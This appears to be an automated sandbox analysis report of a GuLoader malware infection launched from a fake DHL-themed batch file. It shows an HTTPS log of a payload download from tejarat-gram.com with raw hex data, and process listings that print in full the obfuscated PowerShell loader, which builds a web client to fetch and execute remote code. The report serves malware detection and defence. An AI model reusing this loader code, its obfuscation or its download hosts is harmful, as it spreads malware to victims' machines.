                    1192.168.2.449737185.83.114.1244436020C:\Program Files (x86)\Windows Mail\wab.exe
                    TimestampBytes transferredDirectionData
                    2024-07-15 15:37:55 UTC182OUTGET /duWJGPYoYurORY170.bin HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: tejarat-gram.com
                    Cache-Control: no-cache
                    2024-07-15 15:37:55 UTC241INHTTP/1.1 200 OK
                    Date: Mon, 15 Jul 2024 15:37:55 GMT
                    Server: Apache
                    Last-Modified: Thu, 11 Jul 2024 11:46:43 GMT
                    Accept-Ranges: bytes
                    Content-Length: 271424
                    Vary: User-Agent
                    Connection: close
                    Content-Type: application/octet-stream
                    2024-07-15 15:37:55 UTC7951INData Raw: 1e 20 76 ab fe 6d 3c d9 96 d8 3b 0c 34 ed 7e 70 8b 3e 3a ca 23 61 05 be f0 b9 92 8c f2 61 46 4e d9 6d 1a 49 3d fa 75 5e 35 79 4d ee 65 5e ad 61 57 e8 82 44 34 d1 30 f7 20 71 86 7f 0e 88 c6 7f 7b 8c 91 00 9b 5a eb 23 44 a4 e7 c9 15 0a 6b 01 3b 3b e7 05 ea 4b 19 28 c9 b3 b0 b8 cf da 05 d9 49 01 71 d2 6c 27 85 67 d2 44 05 23 fc db a6 20 2d 2e 06 e5 63 74 38 c3 95 7e 81 6c 82 7d 6d f2 59 70 16 b6 21 a4 b1 ee c3 fb 0a c9 4f 89 28 e1 d2 43 06 a0 4a de 81 29 b2 5c 5c 9e e4 cd f6 26 84 fe 8f 3c 5c 5f 00 e6 b4 d4 2b 54 ca 56 3c b0 bd 17 59 52 6e ba ba e9 03 1d a2 5d c5 c6 14 47 d9 3d 55 d8 f8 a1 9e dc ae fb ca 28 aa ac 48 aa 32 db a7 35 51 de ea e2 00 c8 68 d0 a0 6e d7 85 2f 07 ae 58 7b 5a b5 db d8 9a 21 bc 67 c5 f8 9c 1e 84 4d 0b 7f b1 6f e3 e4 79 0d 36 24 d4 37
                    Data Ascii: vm<;4~p>:#aaFNmI=u^5yMe^aWD40 q{Z#Dk;;K(Iql'gD# -.ct8~l}mYp!O(CJ)\\&<\_+TV<YRn]G=U(H25Qhn/X{Z!gMoy6$7
                    2024-07-15 15:37:55 UTC8000INData Raw: 32 51 0b 81 aa 29 fa 8b c1 a8 a1 9b 34 97 4d 9b d4 8e 37 11 1b e2 1b 80 78 ae 4c 88 73 a4 9e af 86 11 b5 ca 34 aa 8f 6b 7a 0a 10 94 a3 d6 45 74 5d 8e 58 6c 38 ad b8 bb d6 c5 2e 12 e5 7b 64 84 9d c2 19 35 5e e3 60 04 8d 14 22 3a ae e1 d8 ea 97 3e 39 02 00 ab b8 a7 c2 f9 e6 17 1c 54 5f 05 05 e3 c1 85 4e 06 03 45 e1 8b 41 b8 81 6f 50 b2 6d d1 e2 38 cf 05 47 06 96 f0 9a b1 1d 80 6a 29 1a f4 d9 cd dc 0b b1 82 f9 ec d8 6b ce 3a e2 19 91 01 00 78 84 83 ee cd 5a 78 59 a6 72 fb 75 77 6a 04 35 2f cd 20 e2 0b 78 fd 1b f1 5a 64 76 2d 77 83 b8 93 51 7f ee e8 81 af 4f 9f 4b fd 59 1b 73 19 53 1a ca 1f 5c d6 f7 50 59 09 39 c6 84 1a ea 48 11 23 6c b4 78 6c e6 3f 06 5a 8a 03 f0 29 58 37 85 67 ae 9f 8f 6e 03 e8 66 ad b6 2e 06 e5 63 4e b4 c4 fd 7c 81 6c 4e 7a 2d c9 91 19 5e
                    Data Ascii: 2Q)4M7xLs4kzEt]Xl8.{d5^`":>9T_NEAoPm8Gj)k:xZxYruwj5/ xZdv-wQOKYsS\PY9H#lxl?Z)X7gnf.cN|lNz-^
                    2024-07-15 15:37:55 UTC8000INData Raw: de 86 c9 3f 64 0c f2 22 d0 c0 f0 50 bc 28 2f 1c d0 c2 3a d1 b9 6e 68 ed 60 46 56 a7 e3 64 cb ca 6e 00 5b 09 d8 e2 1e 83 8a 3a 06 43 23 f9 29 75 c4 df 02 e3 ac 7d 27 e5 d7 2a 3b 78 0b 6f 10 3b cd ff 97 57 eb 38 97 93 e1 58 05 81 ee ed ad 8b ad 1a a4 42 f4 72 76 d2 f6 d3 05 70 bc 9b a2 55 39 a5 8c 7b 36 3a 12 3e 74 66 16 9d 79 28 a3 18 42 cb 37 a4 ac f0 12 cc 75 4e a3 1b f1 6a 16 b6 05 f2 66 7f 0a 17 77 de a0 ee c6 52 98 30 6a 9b 1b c8 44 d2 ab fe 7b 59 d7 97 b5 50 c5 fd b9 5e dc dc 34 e9 d3 ed 01 58 94 ca 31 88 3d 5c 37 b2 b4 87 ca 41 e4 1e 20 12 63 55 bd a6 35 af bd d0 3d 4b 6e 8b ab 81 0f ff 32 89 b3 03 41 c7 5d 10 a3 0d 02 8e a8 26 1b ce 80 f7 5a 02 b0 ea 4a 9b 4b 20 32 03 f6 6f cd 9e 6d 24 97 cc a7 3f 06 68 a7 ef cc 89 43 02 d5 15 3b c2 3f 84 bb 68 cd
                    Data Ascii: ?d"P(/:nh`FVdn[:C#)u}'*;xo;W8XBrvpU9{6:>tfy(B7uNjfwR0jD{YP^4X1=\7A cU5=Kn2A]&ZJK 2om$?hC;?h
                    2024-07-15 15:37:55 UTC8000INData Raw: 3c 72 50 49 4c 88 e7 b9 3f 20 69 9f d7 ca 0f 5b f4 08 13 2d 7b e6 70 2b 21 a8 f4 1c 7f d1 d0 47 7b 75 9e 14 02 b6 2d b0 35 bc 88 d4 d6 a5 f3 7c 02 48 cd cf 76 11 3c db ea 7b 02 f4 6e d4 f0 13 32 7d 45 50 99 8a 12 45 92 df b9 05 18 13 ed 7c 28 7f 10 1a e5 d8 19 3a ff a9 c8 2c 17 86 a4 fe 56 5d b2 d4 17 64 21 2d 91 1d 56 52 23 56 39 91 64 26 92 26 3d 2c 8c 94 56 8c 8d 47 29 ef ae b8 d2 5b a5 fb bf 48 59 e9 41 c6 43 a3 fb 85 00 e7 0a e1 85 37 5f 62 34 be 59 65 ac 86 b6 8c 52 80 28 62 2c 0e 73 4e 17 62 e1 85 e8 c7 a4 5d de f8 d1 8d cc a2 2b b5 c8 00 91 75 1b 1c 1c 8b b7 02 5f b6 47 58 42 5a 6e a4 92 31 5d 3e 71 79 14 0c 2b 97 3e 9c ab 5b 5a c6 ff 27 a7 66 59 be b4 1d 60 36 46 0f 93 f9 71 af 7a 0b 88 72 53 cf 15 dd c3 7a fa f1 c9 1a 9d a0 40 d8 a2 f1 26 d0 d2
                    Data Ascii: <rPIL? i[-{p+!G{u-5|Hv<{n2}EPE|(:,V]d!-VR#V9d&&=,VG)[HYAC7_b4YeR(b,sNb]+u_GXBZn1]>qy+>[Z'fY`6FqzrSz@&
                    2024-07-15 15:37:56 UTC8000INData Raw: 56 4a d3 fd 20 58 f2 5a 3b bd c1 88 7a 2a 99 de 50 14 b0 14 86 2f 24 52 6d 74 51 4f f8 ef 71 40 80 2a b9 20 0c b1 03 6d be 59 db 5d 26 f1 d5 8a 9d fc 26 1c 1b d1 25 39 5c 07 33 bf 52 0e 39 26 6f 32 91 7d d8 e6 7c 17 4a 99 1e 35 a6 b2 14 ff b5 0b 3f 4d 0e 8d 0f 59 a8 29 77 d2 8f b7 04 dd 41 ea c2 ed 0d d6 f4 a5 ee 74 d6 09 5e cb 57 8f e1 81 f1 9c fa 0e d8 54 72 f4 ba b6 25 fe 19 91 b6 d5 d7 f3 25 fa ae 5a df 7c 64 44 3c 6f 19 f1 ae 34 b2 04 0b 2c 96 16 c9 9d 84 5e 56 79 ef d6 98 69 a0 d8 27 a2 b6 f8 49 93 16 5d ae 4a a3 b7 e1 7d f3 15 05 d4 72 e4 d0 95 d3 0f 61 86 b7 a5 46 1e fe 92 b5 51 da c3 e7 32 0c 90 2a a7 6c 5c f8 ba 7e 3c cf da 9e c2 0a c0 b3 7e 56 c1 ea 06 04 85 86 f9 ef fd ba 93 78 cf 54 08 67 e4 89 b9 35 68 3d 5d a1 fe 6b 1d db 31 93 bf f9 de e8
                    Data Ascii: VJ XZ;z*P/$RmtQOq@* mY]&&%9\3R9&o2}|J5?MY)wAt^WTr%%Z|dD<o4,^Vyi'I]J}raFQ2*l\~<~VxTg5h=]k1
                    2024-07-15 15:37:56 UTC8000INData Raw: 50 eb cf 4b 27 8e 05 b3 a1 7e c7 02 66 d2 c5 5f 00 0a ea 9c 0c b4 12 0b f1 ce 2e f4 23 54 b0 42 2c 73 f9 55 07 68 89 7b 59 77 f3 79 84 f1 1d 2b 8a 99 df 97 56 11 7f 2f 53 14 c1 65 09 30 4c a0 a6 7e b7 dc 4d 64 85 23 01 14 54 10 05 a6 ae dc 69 43 42 28 73 45 b8 d8 b1 31 07 3f a1 96 16 e2 f2 71 13 8b 36 f7 34 f7 3c 86 0a 7e e4 0e c1 ed 89 70 45 5a 8a c8 19 90 f4 7b 8b 91 f5 4a 54 42 4f 3f 36 37 bb c5 fa 18 62 39 60 21 b7 72 63 b8 8b 7d ff 9c 94 7f c2 31 3b 27 2e 60 d9 f4 87 c6 2b 7d 6d 3b 14 68 3d 38 43 33 1b c6 2f a6 49 51 3c 0c 70 c9 64 7d 1f 61 38 ad af 00 02 27 03 a1 d5 12 4d 16 5c c0 e9 f9 8d a7 19 d0 5a a8 72 80 71 21 8c 23 8d 30 8f e8 fa 2b 46 5a e0 f6 9f b0 ad a9 5a 28 60 e5 fb 92 c2 cd f9 c7 92 18 6e e5 f3 49 86 10 9c 14 37 bd 59 d0 6f 2e 53 bb b3
                    Data Ascii: PK'~f_.#TB,sUh{Ywy+V/Se0L~Md#TiCB(sE1?q64<~pEZ{JTBO?67b9`!rc}1;'.`+}m;h=8C3/IQ<pd}a8'M\Zrq!#0+FZZ(`nI7Yo.S
                    2024-07-15 15:37:56 UTC8000INData Raw: 91 f1 46 b4 1f 46 36 0f 2e 1e 82 d0 de 07 f1 8b 04 3e 7f 4c 15 c7 2f 35 42 0e f0 93 ca a4 29 11 fe e9 f9 0d 32 61 31 3b 12 aa 3a 44 96 20 59 8e ca b9 39 63 77 c1 a0 7e 9c 55 42 1b 9c 1f 59 b8 76 9b bd c3 f8 c3 5d 40 f2 23 10 57 8f 6f c0 0f c0 7a 72 f3 57 b7 15 da c3 62 d8 a7 f5 ce d5 39 ab 55 20 da 59 9d 46 f2 69 94 fa 11 ad 4d 6c d8 14 2a 68 ec 37 43 f6 cb 89 bc 84 ae 84 04 73 31 93 3d c3 37 2c 48 de da fa 4c 75 d2 7d e3 8a 10 33 87 4b 5b 93 e4 2c a5 90 8b 60 fe 70 f2 32 86 f6 17 21 55 42 fe 9f 56 e9 f8 50 b9 2f ed 62 17 85 d7 76 18 c4 7b 79 96 bd 5b 6d 46 d7 d2 fc 93 4c 6b f7 cd 62 a3 00 0c d4 fb 23 68 3e bd 60 4d d8 1b c8 a6 2a 38 01 fb 16 82 85 8f e6 89 d2 b2 be 42 48 06 d2 cd 58 b6 c6 da 34 90 07 0e da af 48 a2 4d 09 df 10 2e 80 2c e0 c9 35 c6 e7 51
                    Data Ascii: FF6.>L/5B)2a1;:D Y9cw~UBYv]@#WozrWb9U YFiMl*h7Cs1=7,HLu}3K[,`p2!UBVP/bv{y[mFLkb#h>`M*8BHX4HM.,5Q
                    2024-07-15 15:37:56 UTC8000INData Raw: c4 ec 14 6a 27 81 95 9d cf bb ac b6 02 b2 d2 31 55 c0 2a 07 ae 2f a7 7b 82 06 51 96 ad 43 41 06 f7 20 d3 37 83 2d 6b 15 27 af f6 f2 87 4c d5 a9 6a ff 10 57 6d 7b c3 17 45 d5 ad dd 9b 31 78 53 17 96 d1 ce 35 c9 05 45 88 15 63 32 a4 b8 99 03 8c 0b 8b 67 2d 38 b4 e5 7c 06 90 2e ea b6 55 1e 76 85 47 d9 7c 3f 68 dc 54 5f 78 bf b7 c5 b8 6e 1d 28 71 a0 46 d2 81 aa 2c 93 24 79 f3 e7 ba 48 31 19 bd 6f 2a 99 32 dd 04 ab f0 9f 3a 28 ec 91 93 de 33 cf 9b f3 83 70 79 d9 72 99 9f 8a 91 5a 01 0f 94 0e 97 93 17 47 75 5a 7d 11 f4 a8 b4 e9 1b 24 b4 2e 5a 78 c8 60 f6 2d 2d bc 99 43 67 8a 8a ca da 67 68 a3 19 38 44 00 d7 30 e1 07 28 19 3b eb 1e 61 02 0b 47 bc 8d bc 9c 9c 9a cf cf a7 4c 69 97 29 ef 26 dd 24 16 e1 47 cf 4c 7a f9 3a 11 f0 9c 76 42 b8 82 e2 12 2c bb 33 c7 b1 17
                    Data Ascii: j'1U*/{QCA 7-k'LjWm{E1xS5Ec2g-8|.UvG|?hT_xn(qF,$yH1o*2:(3pyrZGuZ}$.Zx`--Cggh8D0(;aGLi)&$GLz:vB,3
                    2024-07-15 15:37:56 UTC8000INData Raw: c9 bd 03 21 22 e4 14 e6 a4 75 70 da 1d c3 95 22 cf b4 1d e3 1d e2 c9 b7 56 c2 7a 51 59 03 4d de 66 26 b7 8b 4c 0e df 98 ae 78 06 80 c5 cc 76 c6 5e 03 30 76 05 6c 06 da c1 63 30 90 33 7c 18 02 0a 7f a4 9d af 74 f8 13 00 53 d9 6e 6a 36 a9 b7 bb d1 9b df 69 4f 49 5f 38 23 9f 54 e1 e7 2e 20 04 f2 94 e2 76 96 43 c7 d6 8d 64 9c f8 12 b2 7c 7a 57 66 c1 3e a1 28 a0 06 da 7e 26 ac 71 aa 4e b2 f0 01 35 bf 63 2d f6 b2 7a ad e0 22 2e aa 64 20 62 15 04 d2 89 30 d2 26 8e 9e 13 82 32 fb be 87 9c 22 67 11 fd 99 16 ad b9 ca 01 96 b0 e7 ce 66 5d 18 cc 6c 51 90 8d b5 fd 06 5b f8 e8 48 13 07 3a 5d 45 6d bb 1c b6 89 2c 80 15 44 69 65 1c 91 c0 f0 23 f3 21 85 1f 0d ca 3c 9c 44 db 3d 31 8b b1 61 43 76 7a 21 9e c5 87 e5 de 33 c1 5d 4f 16 50 31 25 d1 12 ee 0b b7 58 33 f1 0a 63 fd
                    Data Ascii: !"up"VzQYMf&Lxv^0vlc03|tSnj6iOI_8#T. vCd|zWf>(~&qN5c-z".d b0&2"gf]lQ[H:]Em,Die#!<D=1aCvz!3]OP1%X3c
                    2024-07-15 15:37:56 UTC8000INData Raw: e3 55 dd d8 74 d7 72 c0 10 7e 0c ac ec 0c cb b4 bf 30 1f d3 f4 aa d3 78 37 b7 b4 e9 6d a6 8c 78 ce c0 4c 66 a1 3b b5 14 20 4b 85 98 d3 48 2d 94 4a a1 11 0c 20 6b 45 a9 2d 38 83 db 6b ad 63 b5 54 65 2c 3c be dc e3 bc 6d 15 2d 56 9e 1d 99 08 a2 5e 29 cf 45 c4 65 a4 4b f3 67 2c c6 4e dd 70 20 7a 59 25 e9 0b 19 84 6e 51 30 8e 00 fa b4 16 03 b7 a5 4a dc e2 81 cd b9 ea e5 fd ff c5 7c 18 f9 97 b9 be 38 49 42 41 df 51 8f e6 a5 bb 72 2e a8 11 d9 a0 6e f4 eb 26 64 07 d2 fc 4b 08 85 0e 82 ab 7e d2 94 dc ae 4c a1 7f b5 aa 04 93 48 9c 91 c8 b5 8f d8 b8 ed 72 54 d3 5e fa a9 fd b7 37 8e 7d d0 a6 27 ad f4 0b 64 ca ff 97 33 ed b5 04 68 cb 31 c2 d8 60 a7 0e fc 9f 6a e5 0b 4a e9 cd bc c6 4b 02 66 82 68 01 64 8c 8e e0 e8 86 7e f1 90 21 96 0c fe 3c cc ea 2a d0 a2 8e c2 be da
                    Data Ascii: Utr~0x7mxLf; KH-J kE-8kcTe,<m-V^)EeKg,Np zY%nQ0J|8IBAQr.n&dK~LHrT^7}'d3h1`jJKfhd~!<*


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:11:36:57
                    Start date:15/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" "
                    Imagebase:0x7ff740e40000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:1
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
                    Imagebase:0x7ff788560000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:11:36:58
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:11:37:00
                    Start date:15/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
                    Imagebase:0x7ff740e40000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:11:37:07
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth 